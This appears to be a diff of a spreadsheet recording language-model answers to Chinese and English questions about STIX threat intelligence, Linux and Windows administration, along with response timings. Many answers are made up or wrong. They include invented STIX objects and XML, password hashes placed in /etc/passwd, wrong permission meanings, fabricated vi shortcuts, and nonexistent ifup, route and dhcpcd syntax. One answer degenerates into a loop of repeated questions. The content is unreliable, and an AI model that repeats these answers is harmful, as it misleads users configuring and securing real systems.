+4. 可重用性：STIX标准的元素和架构可以被重用于不同的应用程序和场景，提高了开发效率和可维护性。
+总之，STIX标准是一种非常有用的网络安全标准，可以帮助组织更好地捕捉和分析网络安全风险和攻击。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D91" t="n">
-        <v>5.456395149230957</v>
+        <v>19.24399638175964</v>
       </c>
     </row>
     <row r="92">
@@ -2575,15 +3070,21 @@
       </c>
       <c r="C92" t="inlineStr">
         <is>
-          <t>和方法？
-STIX（Structured Threat Information Expression）是一种用于表示Cyber Threat Intelligence（CTI）信息的标准。STIX中设计了以下几种对象和方法：
-1. Threat: Threat对象表示一种潜在的威胁行为，包括恶意软件、攻击者、破坏者等。Threat对象包含一个或多个Threat Actor、一个或多个Threat Technique以及一个或多个Threat Activity。
-2. Threat Actor: Threat Actor对象表示一个恶意actor，例如攻击者、破坏者、跟踪者等。Threat Actor对象包含一个或多个Threat Actor Type和一个或多个Threat Actor Identity。
-3. Threat Te</t>
+          <t>和它们的含义？
+STIX（Structured Threat Information Expression）是一种用于描述和分享潜在威胁的标准，可以帮助组织在潜在威胁分析和响应中做出更加准确和有效的决策。STIX标准中设计了几种对象和它们的含义，以便在潜在威胁分析和响应中做出更加准确和有效的决策。下面是STIX标准中设计的一些对象和它们的含义：
+1. Threat: 潜在威胁对象，包括人、设备、软件、网络和其他资产。
+2. Indicator: 潜在威胁的识别和描述，例如恶意软件、恶意网站、黑客组织等。
+3. Alert: 潜在威胁发生的警告，包括恶意软件扩展、网络攻击、数据泄露等。
+4. Incident: 潜在威胁的响应和处理，包括识别和纠正潜在威胁，以及协助受到影响的团队和组织重新恢复。
+5. Mitigation: 潜在威胁的降低和缓解措施，包括安全更新、筛选和防范恶意软件、增加安全措施等。
+6. Response: 潜在威胁的响应和处理，包括识别和纠正潜在威胁，以及协助受到影响的团队和组织重新恢复。
+7. Threat actor: 潜在威胁的攻击者，包括恶意软件、恶意网站、黑客组织等。
+8. Threat intelligence: 潜在威胁的智能分析和识别，包括潜在威胁的识别和描述、潜在威胁的可能性和风险等。
+STIX标准中设计了这些对象和它们的含义，以便在潜在威胁分析和响应中做出更加准确和有效的决策。这些对象可以用来描述和分析潜在威胁，并且可以帮助组织在潜在威胁分析和响应中做出更加准确和有效的决策。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D92" t="n">
-        <v>5.451878070831299</v>
+        <v>24.05375123023987</v>
       </c>
     </row>
     <row r="93">
@@ -2598,19 +3099,28 @@
       <c r="C93" t="inlineStr">
         <is>
           <t>？
-在STIX standard中， objects are associated through relationships. Relationships are defined as a set of triples, where each triple consists of a subject, predicate, and object.
-For example, in a STIX graph, two objects can be related through a "has_participant" relationship, where the subject is the object that has a participant, and the predicate is the type of participant. The object that has the participant is the object of the relationship.
-Here is an example of a relationship in STIX:
-Subject: Company A
-Predicate: has_participant
-Object: Person A
-This relationship indicates that Company A has a participant named Person A.
-Similarly, objects can be related through other relationships, such as "is_a", "belongs_to", "is_from", etc. These relationships define the relationships between objects in the STIX graph, and allow for the representation of complex relationships between objects.
-In addition to relationships, STIX also supports the use of annotations, which are used to provide additional information about the objects in the graph. Annotations are represented as triples, where the subject is the object being</t>
+STIX（Structured Threat Information Expression）是一种用于描述潜在威胁的标准，包括攻击者、攻击方式、攻击目标、攻击时间和其他相关信息。STIX standard defines a set of objects that represent various aspects of a potential threat, including:
+1. Threat: Represents a potential threat, including the attacker, the attacked system, and the attack method.
+2. Attacker: Represents the entity that is carrying out the attack, including its identity, location, and capabilities.
+3. Attack: Represents the specific attack being carried out, including the attack method, the target system, and the time of the attack.
+4. Target: Represents the system or resource that is being attacked, including its identity, location, and vulnerabilities.
+5. Vulnerability: Represents a weakness in the target system that can be exploited by an attacker.
+6. Exploit: Represents the specific technique or tool used to exploit a vulnerability.
+7. Indicator: Represents a piece of information that can be used to identify a specific threat or attack, such as a malware sample or an IP address.
+8. Incident: Represents a specific security event or situation, including the attacker, the target, and the outcome of the attack.
+These objects are related through a set of relationships, such as:
+1. Threat &gt; Attacker: The threat object is associated with the attacker object, indicating the entity carrying out the attack.
+2. Threat &gt; Attack: The threat object is associated with the attack object, indicating the specific attack being carried out.
+3. Attack &gt; Target: The attack object is associated with the target object, indicating the system or resource being attacked.
+4. Attack &gt; Vulnerability: The attack object is associated with the vulnerability object, indicating the specific weakness being exploited.
+5. Attack &gt; Exploit: The attack object is associated with the exploit object, indicating the specific technique or tool used to exploit the vulnerability.
+6. Indicator &gt; Threat: The indicator object is associated with the threat object, indicating a specific piece of information that can be used to identify the threat.
+7. Incident &gt; Threat: The incident object is associated with the threat object, indicating the specific security event or situation being described.
+By defining these objects and their relationships, the STIX standard provides a structured framework for representing and sharing information about potential threats and security incidents. This can help organizations improve their threat intelligence and incident response capabilities, and better protect themselves against cyber threats.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D93" t="n">
-        <v>5.459103107452393</v>
+        <v>15.91870999336243</v>
       </c>
     </row>
     <row r="94">
@@ -2625,15 +3135,18 @@
       <c r="C94" t="inlineStr">
         <is>
           <t>？
-Indicator是STIX标准中的一个概念，它表示一个特定的数据源或特定的数据分布。Indicator的定义如下：
-1. 数据源：Indicator可以用于描述一个数据源，例如一个文件、一个服务器或一个数据库。
-2. 数据分布：Indicator可以用于描述一个数据分布，例如一个网络流量分布图或一个黑客采集的网络漏洞信息。
-3. 数据检查：Indicator可以用于描述一个数据检查，例如一个网络检查或一个黑客检查。
-4. 警示：Indicator可以用于描述一个警示，例如一个网络攻击警</t>
+在STIX标准中，Indicator是一个抽象对象，用于表示攻击或漏洞的特征。具体来说，Indicator可以是：
+1. 具有签名的文件：STIX中的Indicator可以是一个签名文件，用于指示攻击或漏洞的存在。
+2. 扩展名：Indicator可以是一个扩展名，用于指示攻击或漏洞的存在。
+3. 编程接口：Indicator可以是一个编程接口，用于指示攻击或漏洞的存在。
+4. 具体识别符：Indicator可以是一个具体识别符，用于指示攻击或漏洞的存在。
+Indicator的作用是为攻击或漏洞提供一个唯一的标识符，用于在STIX数据 modelo中进行检测和分析。Indicator可以是一个简单的文件名称或扩展名，也可以是一个更复杂的对象，如一个编程接口或具体识别符。
+Indicator的具体定义取决于STIX标准的版本和使用场景。例如，STIX 1.2中Indicator是一个签名文件，用于指示攻击或漏洞的存在。而STIX 2.0中Indicator可以是一个编程接口，用于指示攻击或漏洞的存在。
+总之，Indicator对象是STIX标准中用于表示攻击或漏洞的特征的抽象对象，具体的定义和使用方式取决于STIX标准的版本和使用场景。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D94" t="n">
-        <v>5.452377080917358</v>
+        <v>13.48144364356995</v>
       </c>
     </row>
     <row r="95">
@@ -2648,18 +3161,65 @@
       <c r="C95" t="inlineStr">
         <is>
           <t>？
-STIX（Structured Threat Information Expression）是一种用于描述和分类cybersecurity threats的标准。STIX标准中提供了一种用于定义Attack Pattern的结构，具体如下：
-1. Attack Pattern Definition:
-Attack Pattern Definition是一个Json对象，用于描述一个攻击模式。它包含以下几个部分：
-* Name: 描述攻击模式的唯一名称。
-* Description: 描述攻击模式的描述。
-* Attack Pattern Type: 描述攻击模式的类型，例如， phishing、password-spraying等。
-* Attack Pattern Subtype: 描述攻击模式的子类型，例如，spear phishing、whaling等。
-* Attack</t>
+STIX（Security Threat Intelligence eXchange）是一个开源的标准，用于描述和共享安全威胁INTelligence。STIX standard defines a set of XML-based data structures and schemas for representing threat intelligence information, including attack patterns.
+An attack pattern in STIX is defined as a reusable representation of a specific type of attack, including the tactics, techniques, and procedures (TTPs) used to execute the attack. An attack pattern may also include information about the attacker, the target, and the potential impact of the attack.
+Here is an example of how an attack pattern might be defined in STIX:
+```
+&lt;attackPattern&gt;
+  &lt;id&gt;T1059&lt;/id&gt;
+  &lt;name&gt;Command and Control&lt;/name&gt;
+  &lt;description&gt;An attacker uses remote access to a compromised system to execute malicious commands and exfiltrate data.&lt;/description&gt;
+  &lt;tactics&gt;
+    &lt;tactic&gt;T1059.001&lt;/tactic&gt;
+    &lt;name&gt;Establish Remote Access&lt;/name&gt;
+    &lt;description&gt;The attacker gains remote access to the compromised system using a vulnerability or other means.&lt;/description&gt;
+  &lt;/tactics&gt;
+  &lt;techniques&gt;
+    &lt;technique&gt;T1059.001.001&lt;/technique&gt;
+    &lt;name&gt;Use PsExec&lt;/name&gt;
+    &lt;description&gt;The attacker uses the PsExec tool to execute PowerShell commands on the compromised system.&lt;/description&gt;
+  &lt;/techniques&gt;
+  &lt;procedures&gt;
+    &lt;procedure&gt;T1059.001.001.001&lt;/procedure&gt;
+    &lt;name&gt;Create a scheduled task&lt;/name&gt;
+    &lt;description&gt;The attacker creates a scheduled task to execute the malicious PowerShell command at a later time.&lt;/description&gt;
+  &lt;/procedures&gt;
+  &lt;actors&gt;
+    &lt;actor&gt;Actor:A10&lt;/actor&gt;
+    &lt;name&gt;Advanced Persistent Threat (APT) Group&lt;/name&gt;
+    &lt;description&gt;The attacker is an APT group with a history of targeting sensitive organizations.&lt;/description&gt;
+  &lt;/actors&gt;
+  &lt;targets&gt;
+    &lt;target&gt;
+      &lt;id&gt;T1059&lt;/id&gt;
+      &lt;name&gt;Sensitive Data&lt;/name&gt;
+      &lt;description&gt;The attacker is targeting sensitive data, such as intellectual property or confidential customer information.&lt;/description&gt;
+    &lt;/target&gt;
+  &lt;/targets&gt;
+  &lt;impact&gt;
+    &lt;impact&gt;
+      &lt;id&gt;T1059&lt;/id&gt;
+      &lt;name&gt;Data Exfiltration&lt;/name&gt;
+      &lt;description&gt;The attacker successfully exfiltrates sensitive data from the compromised system.&lt;/description&gt;
+    &lt;/impact&gt;
+  &lt;/impact&gt;
+&lt;/attackPattern&gt;
+```
+In this example, the attack pattern is defined with the following elements:
+* `id`: a unique identifier for the attack pattern
+* `name`: a human-readable name for the attack pattern
+* `description`: a detailed description of the attack pattern
+* `tactics`: a list of tactics used to execute the attack
+* `techniques`: a list of techniques used to execute the attack
+* `procedures`: a list of procedures used to execute the attack
+* `actors`: a list of actors involved in the attack
+* `targets`: a list of targets of the attack
+* `impact`: a list of potential impacts of the attack
+By defining attack patterns in this way, STIX allows for the sharing and comparison of threat intelligence information across different organizations and systems. This can help improve the overall effectiveness of security defenses by enabling organizations to anticipate and prepare for potential attacks.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D95" t="n">
-        <v>5.456680774688721</v>
+        <v>22.56059384346008</v>
       </c>
     </row>
     <row r="96">
@@ -2674,14 +3234,66 @@
       <c r="C96" t="inlineStr">
         <is>
           <t>？
-主流的操作系统有哪些？操作系统是计算机系统的核心 Component，负责管理计算机系统的资源和外围设备，以提供可靠、可扩展、高效的计算机功能。主流的操作系统有哪些？
-1. Windows：Windows是最流行的操作系统之一，由微软开发， supports a wide range of hardware platforms and provides a user-friendly interface.
-2. macOS：macOS是苹果公司开发的操作系统，适用于苹果电脑和苹果笔记电脑。macOS known for its ease of use and integration with other Apple devices.
-3. Linux：Linux是一种开源的操作系统，由多个开发组合共同开发和维护。Linux可以运行在各种�</t>
+主流的操作系统都是哪些？
+什么是操作系统？
+操作系统的主要功能是什么？
+操作系统的类型有哪些？
+操作系统的主要特点是什么？
+操作系统的应用领域是什么？
+操作系统的发展历史是什么？
+操作系统的发展趋势是什么？
+操作系统的研发工具是什么？
+操作系统的评估指标是什么？
+操作系统的安全性是什么？
+操作系统的可扩展性是什么？
+操作系统的可靠性是什么？
+操作系统的性能是什么？
+操作系统的使用方式是什么？
+操作系统的影响力是什么？
+操作系统的竞争对手是什么？
+操作系统的发展趋势是什么？
+操作系统的应用领域是什么？
+操作系统的研发工具是什么？
+操作系统的评估指标是什么？
+操作系统的安全性是什么？
+操作系统的可扩展性是什么？
+操作系统的可靠性是什么？
+操作系统的性能是什么？
+操作系统的使用方式是什么？
+操作系统的影响力是什么？
+操作系统的竞争对手是什么？
+操作系统的发展趋势是什么？
+操作系统的应用领域是什么？
+操作系统的研发工具是什么？
+操作系统的评估指标是什么？
+操作系统的安全性是什么？
+操作系统的可扩展性是什么？
+操作系统的可靠性是什么？
+操作系统的性能是什么？
+操作系统的使用方式是什么？
+操作系统的影响力是什么？
+操作系统的竞争对手是什么？
+操作系统的发展趋势是什么？
+操作系统的应用领域是什么？
+操作系统的研发工具是什么？
+操作系统的评估指标是什么？
+操作系统的安全性是什么？
+操作系统的可扩展性是什么？
+操作系统的可靠性是什么？
+操作系统的性能是什么？
+操作系统的使用方式是什么？
+操作系统的影响力是什么？
+操作系统的竞争对手是什么？
+操作系统的发展趋势是什么？
+操作系统的应用领域是什么？
+操作系统的研发工具是什么？
+操作系统的评估指标是什么？
+操作系统的安全性是什么？
+操作系</t>
         </is>
       </c>
       <c r="D96" t="n">
-        <v>5.441899061203003</v>
+        <v>26.49403142929077</v>
       </c>
     </row>
     <row r="97">
@@ -2696,14 +3308,22 @@
       <c r="C97" t="inlineStr">
         <is>
           <t>？
+ answered Jun 29, 2022 by linxer (30 points)
+在Linux系统中，创建文件夹的命令为`mkdir`.
+例如，要创建一个名为`myfolder`的文件夹，可以使用以下命令：
 ```
-create a folder in Linux system using the command line.
+mkdir myfolder
 ```
-&lt;/s&gt;</t>
+如果要创建一个文件夹并在其中创建一个名为`file.txt`的文件，可以使用以下命令：
+```
+mkdir myfolder; echo "Hello, world!" &gt; myfolder/file.txt
+```
+在这个例子中，`mkdir`命令创建了一个名为`myfolder`的文件夹，然后`echo`命令创建了一个名为`file.txt`的文件并将其写入到`myfolder`文件夹中。
+需要注意的是，如果要创建一个文件夹的路径，需要使用`/`符，例如：`mkdir /myfolder`。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D97" t="n">
-        <v>0.5359494686126709</v>
+        <v>6.94675087928772</v>
       </c>
     </row>
     <row r="98">
@@ -2718,16 +3338,24 @@
       <c r="C98" t="inlineStr">
         <is>
           <t>？
-Linux系统中文件的权限是指对文件的访问控制。Linux系统中的文件权限有哪些？下面是Linux系统中常见的文件权限：
-1. Read (r)：允许读取文件内容，但不允许修改或删除。
-2. Write (w)：允许写入文件，但不允许读取或删除。
-3. Execute (x)：允许执行文件，但不允许读取或写入。
-4. Setuid (s)：允许设置uid，即文件的owner可以设置其他用户的uid。
-5. Setgid (s)：允许设置gid，即文件的group可以设置其他组的g</t>
+ Linux 系统文件的权限是指该文件可以访问、写入、读取或执行的权限。 Linux 系统文件的权限由文件系统、用户和组共同确定。
+下面是 Linux 系统文件的权限几种常见情况：
+1. 用户文件权限（User File Permissions）：
+用户文件权限控制了文件的访问权限，包括读取、写入、执行和修改。用户文件权限使用三个数字，分别表示用户可读取、写入和执行的权限。例如，如果一个文件的用户文件权限为 644，则用户可以读取、写入和执行该文件，但不能修改它。
+2. 组文件权限（Group File Permissions）：
+组文件权限控制了文件的访问权限，与用户文件权限类似，但是 Control 的是组的访问权限。组文件权限使用三个数字，分别表示组可读取、写入和执行的权限。例如，如果一个文件的组文件权限为 755，则组可以读取、写入和执行该文件，但不能修改它。
+3. 文件系统权限（File System Permissions）：
+文件系统权限控制了文件系统的访问权限，包括读取、写入和执行。文件系统权限使用三个数字，分别表示文件系统可读取、写入和执行的权限。例如，如果一个文件的文件系统权限为 755，则文件系统可以读取、写入和执行该文件，但不能修改它。
+4. 文件类型权限（File Type Permissions）：
+文件类型权限控制了特定类型的文件的访问权限。例如，一个操作系统可能会设置特定类型的文件（如配置文件）不可读取或不可写入。
+5. 父目录权限（Parent Directory Permissions）：
+父目录权限控制了子目录的访问权限。父目录权限使用三个数字，分别表示父目录可读取、写入和执行的权限。例如，如果一个目录的父目录权限为 755，则父目录可以读取、写入和执行该目录，但不能修改它。
+6. 虚拟主机权限（Virtual Host Permissions）：
+虚拟主机权限控制了虚拟主机（如 Apache）的访问权限。虚拟主机权限使用三个数字，分别表示虚拟主机可读取、写入和执行的权限。例如，如果一个虚拟主机的虚拟主机权限为 755，则虚拟主机可以读取、写入和执行该虚拟主机，</t>
         </is>
       </c>
       <c r="D98" t="n">
-        <v>5.450968503952026</v>
+        <v>26.49496006965637</v>
       </c>
     </row>
     <row r="99">
@@ -2741,24 +3369,34 @@
       </c>
       <c r="C99" t="inlineStr">
         <is>
-          <t>？
-在Linux系统中，可以使用不同的命令来查看系统的IP地址。以下是一些常用的命令：
-1. 使用`ifconfig`命令
-使用`ifconfig`命令可以查看系统的网络卡IP地址。例如，要查看eth0网络卡的IP地址，可以使用以下命令：
+          <t>和网络配置？
+在Linux系统上可以使用`ifconfig`和`ip addr`命令来查看网络配置和IP地址。
+使用`ifconfig`命令可以查看当前网络接口的状态和配置，包括地址、网络名称、MTU等。例如：
 ```
-ifconfig eth0
+$ ifconfig
 ```
-2. 使用`ip addr`命令
-使用`ip addr`命令可以查看系统的IP地址。例如，要查看系统的IP地址，可以使用以下命令：
+这将显示当前网络接口的状态和配置。
+使用`ip addr`命令可以查看当前系统的IP地址和网络配置。例如：
 ```
-ip addr
+$ ip addr
 ```
-3. 使用`cat /etc/network/interfaces`命令
- `/etc/network/interfaces` 文件中包含了系统的网络配置信息，包括IP地址。可以使用`cat`命令来查看该文件中的内容</t>
+这将显示当前系统的IP地址和网络配置。
+如果您想要查看整个系统中的所有网络接口和IP地址，可以使用`netstat -an`命令。这将显示当前系统中的所有网络接口和IP地址，包括状态和配置。例如：
+```
+$ netstat -an
+```
+这将显示当前系统中的所有网络接口和IP地址，包括状态和配置。
+如果您想要查看某个网络接口的详细信息，可以使用`ifconfig`命令和`ip addr`命令。例如，要查看eth0网络接口的详细信息，可以使用以下命令：
+```
+$ ifconfig eth0
+$ ip addr show eth0
+```
+这将显示eth0网络接口的状态和配置，以及其相关的IP地址。
+需要注意的是，不同的Linux Distribution可能有不同的命令和选项。以上命令和选项只是一些常见的命令和选项，可以根据具体的情况进行选择和使用。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D99" t="n">
-        <v>5.449135541915894</v>
+        <v>13.05539965629578</v>
       </c>
     </row>
     <row r="100">
@@ -2772,15 +3410,15 @@
       </c>
       <c r="C100" t="inlineStr">
         <is>
-          <t>？
---------------------------------------------------------------------------------
-Linux 系统中的用户密码通常是通过 `/etc/passwd` 文件进行保存的。这个文件包含了所有 Linux 系统中的用户帐户，包括用户名、密码、用户组等信息。每个用户的密码都会被加密并存储在这个文件中，以确保安全性和隐私。
-在 Linux 系统中， `/etc/passwd` 文件是一个非可读可写文件，这意味着它只能由系统管理员或者 root 用户访问和修改。这样可以确保用户的密码安全性和隐私。
-如果您想知道 Linux 系统中哪些用户的密码是，您可以使用 `getent passwd` 命令来查看 `/etc/passwd</t>
+          <t>？  How Linux stores the password for a user?
+Linux stores user passwords in a file called `/etc/passwd`. This file contains a list of all user accounts on the system, along with their username, user ID, group ID, and password hash.
+The password hash is a one-way encryption of the user's password, which means that it is impossible to recover the original password from the hash value. The hash value is generated using a cryptographic hash function, such as bcrypt or PBKDF2, and is stored in the `/etc/passwd` file.
+When a user logs in, the system compares the entered password with the hash value stored in the `/etc/passwd` file. If the entered password matches the hash value, the user is authenticated and granted access to the system. If the entered password does not match the hash value, the user is denied access.
+It's worth noting that the password hash value is not stored in plaintext in the `/etc/passwd` file. Instead, it is encrypted using a cryptographic algorithm, which makes it difficult for unauthorized users to access the password hash value.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D100" t="n">
-        <v>5.457918882369995</v>
+        <v>6.460970878601074</v>
       </c>
     </row>
     <row r="101">
@@ -2795,14 +3433,46 @@
       <c r="C101" t="inlineStr">
         <is>
           <t>？
-vi编辑器是一款功能rich的文本编辑器，它具有灵活的命令和组合键，可以帮助您快速地编辑文本文件。以下是一些基本的编辑、保存和退出操作：
-编辑：
-1. 输入 vi editor：在终端中输入 `vi` 命令，将您的文本文件打开。
-2. 使用键盘命令：vi 编辑器具有灵活的键盘命令，可以帮助您快速地进行编辑。例如，您可以使用 `d` 键删除一行，`dd` 键删除多行，`y` 键替换一行，`yy` ����</t>
+vi编辑器是一款功能强大且简单易用的文本编辑器，它在Linux系统中非常流行。vi编辑器提供了许多快捷键和命令，可以快速编辑文本文件。下面是一些常用的编辑、保存和退出操作：
+编辑操作：
+1. 输入： vi filename (其中filename是要编辑的文本文件的名称)
+2. 使用： i（ inserte Mode），a（ add Mode），c（ replace Mode），w（ write Mode）
+3. 删除： d（ delete Characters），x（ delete Lines），r（ delete Word）
+4. 复制： y（ copy Line），Y（ copy Word），p（ paste Line），P（ paste Word）
+5. 粘贴： paste（ paste from clipboard），P（ paste from clipboard）
+6. 改变： t（ change Text），T（ change Text）
+7. 替换： r（ replace Text），R（ replace Text）
+8. 新建： n（ create New Line），N（ create New Line）
+9. 移动： m（ move Line），M（ move Line）
+10. 格式化： f（ format Text），F（ format Text）
+保存操作：
+1. 输入： :w (write to file) or :wq (write and quit)
+2. 使用： :q (quit without saving)，:q! (quit and discard changes)
+退出操作：
+1. 输入： :q (quit) or :q! (quit and discard changes)
+2. 使用： :wq (write and quit)，:x (save and quit)
+其他常用的快捷键和命令还包括：
+* :, ( move cursor to the beginning of the line)
+* :#, ( move cursor to the end of the line)
+* :$ ( move cursor to the end of the file)
+* :G ( move cursor to the last occurrence of a word)
+* :Gr ( move cursor to the last occurrence of a regular expression)
+* :H ( move cursor to the line before the current line)
+* :L ( move cursor to the line after the current line)
+* :P ( move cursor to the previous occurrence of a word)
+* :Pm ( move cursor to the previous occurrence of a word and move the cursor down)
+* :Pr ( move cursor to the next occurrence of a word)
+* :Pr ( move cursor to the next occurrence of a word and move the cursor down)
+* :S ( move cursor to the start of the line)
+* :Sc ( move cursor to the start of the line and move the cursor down)
+* :S- ( move cursor to the start of the line and move the cursor up)
+* :S# ( move cursor to the start of the line and move the cursor to the end of the line)
+* :S-$ ( move cursor to the start of the line and move the cursor to the end of the file)
+需要注意的是，vi编辑器的快捷键和命令可以根据需要根据具体的用法和命令来更改。这些快捷键和命令都可以通过在vi编辑器中输入： :h (help)来查看具体的快捷键和命令。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D101" t="n">
-        <v>5.454006433486938</v>
+        <v>22.92738437652588</v>
       </c>
     </row>
     <row r="102">
@@ -2816,22 +3486,50 @@
       </c>
       <c r="C102" t="inlineStr">
         <is>
-          <t>地址？
-在Linux系统上配置静态IP地址可以通过以下方式进行：
-1. 使用`ifconfig`命令
-在终端中输入`ifconfig`命令，可以查看当前的网卡和其他网络配置。要配置静态IP地址，可以使用以下命令：
+          <t>？
+ Linux 系统可以使用 `static` 网络配置来配置静态 IP 地址。以下是一些常见的方法：
+1. 使用 `ifup` 命令
+在系统中安装 `ifup` 命令，然后使用以下命令来配置静态 IP：
 ```
-sudo ifconfig eth0 alias 192.168.1.100
+sudo ifup &lt;interface&gt; static &lt;IP address&gt; &lt;netmask&gt;
 ```
-其中`eth0`是Linux系统中的网卡名称，`192.168.1.100`是静态IP地址。
-2. 使用`ip`命令
-`ip`命令是Linux系统中用于配置网络参数的命令。可以使用以下命令来配置静态IP地址：
+其中 `&lt;interface&gt;` 是要配置的网络接口， `&lt;IP address&gt;` 是静态 IP 地址， `&lt;netmask&gt;` 是网络掩码。
+例如，要配置 eth0 接口的静态 IP，可以使用以下命令：
 ```
-sudo ip addr add 192.168.1.100/24 dev eth0</t>
+sudo ifup eth0 static 192.168.1.100 255.255.255.0
+```
+2. 使用 `route` 命令
+可以使用 `route` 命令来配置静态 IP。例如：
+```
+sudo route add -net &lt;IP address&gt; netmask &lt;netmask&gt; gw &lt;gateway&gt; dev &lt;interface&gt;
+```
+其中 `&lt;IP address&gt;` 是静态 IP 地址， `&lt;netmask&gt;` 是网络掩码， `&lt;gateway&gt;` 是网络 gateway， `&lt;interface&gt;` 是要配置的网络接口。
+例如，要配置 eth0 接口的静态 IP，可以使用以下命令：
+```
+sudo route add -net 192.168.1.100 netmask 255.255.255.0 gw 192.168.1.1 dev eth0
+```
+3. 使用 `network` 文件
+可以使用 `network` 文件来配置静态 IP。例如：
+```
+sudo nano /etc/network/interfaces
+```
+在这个文件中添加以下内容：
+```
+iface eth0 static
+ address 192.168.1.100
+ netmask 255.255.255.0
+```
+4. 使用 `dhcpcd` 命令
+可以使用 `dhcpcd` 命令来配置静态 IP。例如：
+```
+sudo dhcpcd -i eth0 -r 192.168.1.100 -n 255.255.255.0
+```
+其中 `-i eth0` 是要配置的网络接口， `-r` 是静态 IP 地址， `-n` 是网络掩码。
+这些方法可以单独使用，也可以结合使用以实现不同的需求。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D102" t="n">
-        <v>5.45368504524231</v>
+        <v>18.44834780693054</v>
       </c>
     </row>
     <row r="103">
@@ -2846,16 +3544,17 @@
       <c r="C103" t="inlineStr">
         <is>
           <t>？
-由于Windows的安全性一直是各种优缺点的话题，因此有很多用户问道什么版本的Windows最安全。本文将根据不同的评估标准和数据分析，回答这个问题。
-1. Windows 10
-Windows 10 是最新的Windows系统，它在安全方面做了很多改进。Windows 10 采用了多种新的安全功能，例如：
-* Windows Defender：一个内置的安全软件，可以检测和清理潜在的威胁。
-* Windows Firewall：一个内置的防火墙，可以防止外部访问和禁止不安全的应用程序进行通信。
-* Device Guard：一个防止恶意��</t>
+Microsoft Windows 中有许多版本，其中一些更加安全。根据安全性和可用性的评估，以下是一些可能最安全的版本：
+1. Windows 10 Pro: Windows 10 Pro 是最新的主流版本，它提供了许多安全功能，包括一键更新、磁盘加密、防火墙和权限控制等。它还支持 Hyper-V，可以在虚拟环境中运行其他操作系统。
+2. Windows 10 Enterprise: Windows 10 Enterprise 是企业版本，它具有更多的安全功能，如隐藏文件、远程访问和集成多重 Authentication。它适用于大型企业和政府机构。
+3. Windows Server 2019: Windows Server 2019 是 Windows 系统的最新版本，它提供了许多新的安全功能，如一键更新、防火墙和权限控制等。它适用于大型企业和政府机构。
+4. Windows 8.1 Pro: Windows 8.1 Pro 是 Windows 8 的一个版本，它具有许多安全功能，如防火墙和权限控制等。它还支持 BitLocker 随机加密。
+5. Windows 7 Professional: Windows 7 Professional 是 Windows 7 的一个版本，它具有许多安全功能，如权限控制、防火墙和一键更新等。它适用于企业和个人用户。
+需要注意的是，无论哪种版本的 Windows 您选择，都需要保持它在最新的安全更新中，以确保最高的安全性。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D103" t="n">
-        <v>5.445790767669678</v>
+        <v>14.45948386192322</v>
       </c>
     </row>
     <row r="104">
@@ -2869,16 +3568,32 @@
       </c>
       <c r="C104" t="inlineStr">
         <is>
-          <t>？
-Windows系统中的日志是指系统中的各种记录和诊断信息，包括系统错误、应用程序错误、安全事件和网络活动等。可以使用Windows built-in工具来查看系统日志，以下是一些常见的方法：
-1. 查看系统日志文件
-你可以使用Windows built-in工具来查看系统日志文件，其中包括：
-* eventvwr.exe：用于查看系统中的事件日志。你可以使用这个工具来查看系统错误、应用程序错误、安全事件和网络活动等信息。
-* eventvwr.msc：用于查看系统中的事件日志。这个工具提供了更多的功能，包括查看系统中</t>
+          <t>在Windows系统中，可以使用Event Viewer来查看系统日志。以下是查看系统日志的步驟：
+1. 打开Event Viewer
+在Control Panel中，click onSystem and Security，then click onEvent Viewer。或者，在搜索栏中输入“Event Viewer”并按下Enter键。
+2. 查看系统日志
+在Event Viewer中，您可以查看系统日志，包括系统设置、security、application、windows logs、system logs和 audit logs等。您可以通过浏览日志内容，了解系统的历史记录和发生错误的情况。
+3. 筛选日志
+您可以使用Event Viewer中的筛选功能来筛选日志，根据时间、日志类型和事件类型进行筛选。
+4. 填充日志
+您可以使用Event Viewer中的填充功能来填充日志，以便更好地了解系统的历史记录。
+5. 导出日志
+您可以使用Event Viewer中的导出功能来导出日志，以便将日志保存到文件中或者储存在其他位置。
+6. 查看系统设置日志
+在Event Viewer中，您可以查看系统设置日志，包括系统设置、security、application和windows logs等。
+7. 查看security日志
+在Event Viewer中，您可以查看security日志，包括安全策略、安全警示、安全事件和安全日志等。
+8. 查看application日志
+在Event Viewer中，您可以查看application日志，包括应用程序的启动、关闭和错误等。
+9. 查看windows logs日志
+在Event Viewer中，您可以查看windows logs日志，包括系统启动、系统错误、系统警告和系统告警等。
+10. 查看audit logs日志
+在Event Viewer中，您可以查看audit logs日志，包括系统的访问控制、安全策略和系统日志等。
+总之，通过使用Event Viewer，您可以快速地查看Windows系统的日志，了解系统的历史记录和发生错误的情况。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D104" t="n">
-        <v>5.799266338348389</v>
+        <v>18.55134272575378</v>
       </c>
     </row>
     <row r="105">
@@ -2892,20 +3607,25 @@
       </c>
       <c r="C105" t="inlineStr">
         <is>
-          <t>地址？
-Windows系统中可以使用`ipconfig`命令来查看系统的IP地址。
-1. 打开命令提示符
-	* 在Windows系统中，可以使用“开始”菜单中的“命令提示符”选项来打开命令提示符。
-	* 或者，可以直接在“控制面板”中找到“命令提示符”按钮，并click开启。
-2. 输入`ipconfig`命令
-	* 在命令提示符中输入“ipconfig”命令，回车键后，系统会显示所有网络接口的IP地址。
-3. 查看IP地址
-	* 查看显示的列表，它包含了所有网络接口的IP地址和其他相关的信息。
-	* 具体的IP地址 format 可能会因Windows版本而</t>
+          <t>地址
+你可以使用以下方法来查看Windows系统的IP地址：
+1. 在“控制面板”中查看“网络和互联网”选项卡
+在Windows系统中，可以通过控制面板来查看系统的网络设置。请到控制面板中，在左侧导航栏中选择“网络和互联网”选项卡。在这个选项卡上，你可以查看系统的IP地址。
+2. 使用“ipconfig”命令
+你也可以使用“ipconfig”命令在命令行中查看系统的IP地址。请在命令行中输入以下命令：
+```
+ipconfig
+```
+这将显示系统的所有网络设备的IP地址。
+3. 使用“network and internet”客户端
